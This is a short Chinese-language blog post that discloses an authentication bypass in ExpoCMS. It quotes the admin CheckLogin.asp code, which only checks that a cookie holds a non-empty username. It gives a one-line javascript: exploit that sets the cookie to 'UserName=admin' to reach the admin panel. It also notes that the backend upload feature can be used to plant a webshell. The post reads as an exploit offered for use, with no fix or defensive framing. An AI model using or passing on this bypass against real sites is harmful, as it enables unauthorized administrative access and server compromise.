当前位置: iick's blog > 网站漏洞 > ExpoCMS后台验证漏洞

ExpoCMS后台验证漏洞

作者:hack1990 时间:11-01-07 阅读数:655人阅读

/admin/CheckLogin.asp

 

  1. <%
  2. Response.Buffer = True
  3. Response.Expires = -1
  4. Response.ExpiresAbsolute = Now() - 1
  5. Response.Expires = 0
  6. Response.CacheControl = "no-cache"
  7. Session.CodePage = 65001
  8. Response.Charset = "UTF-8"
  9. UserName=Request.Cookies("CNVP_CMS2")("UserName")  '在cookie中取username值
  10. If UserName="" Then     
  11.         Response.Redirect("Admin_Login.asp")        '如果为空,就跳转
  12.         Response.End()
  13. End If
  14. %>

 

exp: javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")   这样就能进后台了  /admin/Admin_Index.asp
后台有个上传的地方可以拿webshell

上一篇:360秘密收集用户信息日志文件大规模外泄

下一篇:吐司 T00ls.Net主域名于 2011-01-05 19:30 被劫持

相关文章

发表评论